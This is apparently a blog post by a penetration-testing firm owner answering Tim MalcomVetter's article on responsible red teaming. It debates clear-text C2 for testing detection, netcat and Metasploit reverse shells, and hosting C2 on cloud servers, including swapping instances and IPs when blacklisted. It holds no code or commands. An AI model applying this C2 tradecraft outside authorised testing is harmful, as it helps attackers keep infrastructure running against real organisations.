Responsible Red Teams
Tim MalcomVetter
1852

There was a very well thought out article on responsible red teaming by Tim MalcomVetter. However, I feel there are a number of issues with the conclusions and approaches that require a bit more nuance and discussion.

· Responsible red teams protect data. That means they use encrypted protocols for C2. And for exfiltration they encrypt the data, maybe just by downloading over an encrypted protocol, but at least by encrypting the data at the file level before sending it over an unencrypted protocol.

I agree with protecting customer data. However, this section is possibly a bit oversimplified. Remember, the goal is not to “win” in a red team by getting C2. It is to identify clipping levels of detective controls. And, that does sometimes require sending some data unencrypted. For example, actual OS commands should be sent clear text to test if the IDS/IPS/Firewall technologies can detect them. Further, a good tester should send some mock data (i.e. Credit Cards, SSN, etc.) unencrypted as well to test DLP. Our goal is to test what is working and what is not. As for customer specific data, we have taught at SANS for years that customer data should not be pulled off a customer system if it can be avoided. For example, screenshots “select count *” queries and flags should be enough. I would agree that pulling lots and lots of customer data of of a system would be a bad call. But, there are other “responsible” ways to demonstrate access without jeopardizing a customer. I also feel that pulling more data than necessary is bad call regardless of if encryption is used or not.

Responsible red teams also authenticate their C2 servers.* Regardless of the tools they drop, they ensure the callbacks out over the internet are reliably resilient and hardened against a random third party taking over their shells.

I base a lot of my perceptions of risk on what I have seen over the years. I have yet to see a pentester’s reverse connection be taken over by a random third party. Is it possible? Sure. Through DNS/ARP poisoning or possibly a BGP prefix attack. But, if those attacks are happening, an organization has a lot more to worry about than a simple reverse connection a pentester forgot. I want to stress, these attacks used by some random party to steal a session is not likely, and I have never seen it, or heard of it. I feel comfortable enough in what I have seen and not seen to say that unauthenticated reverse connections are a pretty low risk. Now, leaving bind shells and implants open? Yes, that would be bad. Do not do that. Ever.

That means that responsible red teams don’t use netcat for forward or reverse shells. Knock that off. Maybe you need to use it once for an internal lateral movement between two highly controlled, non-mobile endpoints (two servers in a datacenter). Maybe. But that should be a last resort. Or do it only because of a specific blue team training objective. And make sure you have read-in a “trusted agent” from the blue team leadership to ensure it can be monitored and not abused in the process.

Again, this ties to my first response. Very few organizations can detect clear text C2. Yes, we need to test this. Yes, we have to show it is possible. That is our job as pentesters. However, I would agree with the statements about it being communicated and being a clear training objective. The customer needs to know what you are doing and why.

That also means responsible red teams don’t use metasploit. Not even paranoid mode or metasploit pro. Sorry. I know this may be your favorite tool, but it doesn’t properly authenticate the server calling back out. I can hear your “but…” objections now. It’s for a short duration, or you’re very careful, etc. What happens when that artifact you drop in the target environment gets missed during cleanup and actually executes a year later? Who’s going to have meterpreter running at w.x.y.z then? Maybe nobody. Maybe somebody. It’s 2018, there are better options. (Maybe the metasploit team can add in actual server auth, but then again, metasploit was never really intended to be a C2 tool.)

This, is not a statement that will win friends. This sounds like I am taking a dig on the author, but it is not. He has an opinion. It is not going to be popular. And I commend people with unpopular opinions. However, I disagree. There are a lot of maybes in the above section. Once again, it boils down to risk. I would argue there are very few situations where organizations were compromised because of Meterpreter reverse sessions sitting around. I would also argue that the problem about an artifact being left behind for a year after an engagement would be a problem whether it was Metasploit or not. But yes, paranoid mode with Meterpreter does fix this issue. It ties a Metrepreter agent to a specific session. This should resolve this concern of the author. Tim owned up to this misunderstanding. We are cool. We all learned. Lets move on.

Responsible red teams don’t throw C2 servers all over virtual private cloud providers. Yes, it’s cool, your neat little red team automation script can deploy Empire and Cobalt Strike servers all over Digital Ocean, Linode, AWS, Azure, Google Cloud, with zero clicks … but why? There is a reason why the InfoSec community-as-a-whole churns every time we read about highly sensitive data running “on somebody else’s computer” (as the T-Shirt describes what “the cloud” really is). When you’re operating in your customer’s target environment, did you really think you wouldn’t access their most treasured secrets? Or are you just an insensitive jerk and don’t respect their data or their customers’ and employees’ data? How well did you clean up? Did you get a contract with that cloud provider stating they were going to protect your customers’ data? Did they sign on to be an extension of your customer’s PCI cardholder data environment?

This may seem like a good idea. If you do this for a while as a consultant, you will learn better. True story. Long ago, when I thought the exact same way as the above section, we had a redirect which pointed to our C2 infrastructure in South Dakota. What people who recommend the above approach do not understand, is that the Internet is constantly being crawled. Crawled by government agencies, crawled by Google and every other search engine out there. All it takes to shut down a whole C2 infrastructure is one of these crawlers hitting one of your phishing/C2 servers, registering it as malicious then blacklisting it. Blacklists get shared, very, very quickly. Then, your C2 IP range is blacklisted. That will shut down operations. You will miss deadlines. Customers will not be happy.

This is not a perceived risk. This happened. Not just to BHIS, but to other firms as well.

And, if this happens while using a cloud provider, we kill the image, spin up a new one and get a new IP. All in moments. This is not driven from laziness. It is driven from practicality.

I would also add this. The cloud is everywhere. I don’t much like it either. It is the outsourcing of the future. You cannot say we, as pentester’s, cannot trust the cloud. We do. We all know it. I hate the argument that we cannot trust Digital Ocean, AWS, Azure or Linode. You do. Every day, there is tons of sensitive data “on someone else’s computer.”

And, here is a very easy way to look at it. Lets say Google, Amazon, Azure or Digital Ocean gets hacked. Lets say they go rogue and start looking at data on servers. What is the news story going to be? That a penetration testing firm’s data was leaked? Or, that a cloud provider was hacked?

Look, I hate the fact that we all in IT use the cloud so much. But it is the future. In fact, it is the now.

Responsible red teams install their C2 servers in private data centers with all of the regular management overhead around them, and then deploy simple TCP redirectors at various parts of the internet to give the appearance of having this highly distributed infrastructure. And guess what … when you do that, your “cloud infrastructure” is typically just a couple lines of shell script (if that) per redirector host. If it gets “burned” and needs to move, it’s a 2 minute manual task — probably as fast as your infrastructure automation task. Faster if you automate that very simple 2 minute task.

This is a continuation of the previous section. If a core contention is that cloud providers cannot be trusted, in this explanation and the follow-up article, the data is still going through a cloud provider. Yes, there is encryption and authentication, but the core contention that cloud providers cannot be trusted falls, because of the use of a cloud provider as a redirect.

I hear arguments of trust all the time. People say they cannot trust Metasploit/Kali/AWS/Gmail/Slack/GSA/Equifax/Snapchat/PokemonGo for whatever reasons. While it sounds cool to be paranoid it can quickly devolve into chest thumping as to who is the most paranoid.

If you are using a computer, you are trusting a lot of organizations. You trust DNS providers, CAs, OS vendors, coding language developers, ISPs and yes cloud providers.

I would argue, that using a virtual private cloud provider has made us more secure. We have direct control and visibility over all assets. We provision and decommission servers in a matter of seconds. Our IP addresses are not static. We have maximum flexibility with relays and firewalls. Patching and updates are far easier. In fact, most all of the reasons people move to the cloud and try to implement a DevOps approach are good reasons to move to a VPC as a pentesting company as well.

Now, it can be done wrong. You could have testers all spin their own accounts up. You could reuse the same instances for multiple tests. You could leave customer data where it is accessible to anyone on the Internet. But, if you think about it, the same mistakes can be made on a dedicated C2 infrastructure.

Please do not take this to mean I am angry at Tim. Not even close. Tim is one of the good ones. In fact, I called him before publishing this response. He just has a different perspective. He works at a fortune 1 company. He has different requirements and restrictions from me. I run a company that does hundreds of tests a year for multiple different customers. Trust me, this difference, makes a difference. The approach we use works well for us. His approach works well for him. We can have disagreements without devolving into name calling.

And, at the end of the day, both Tim and I want things to get better. Conversations like this help us all get better.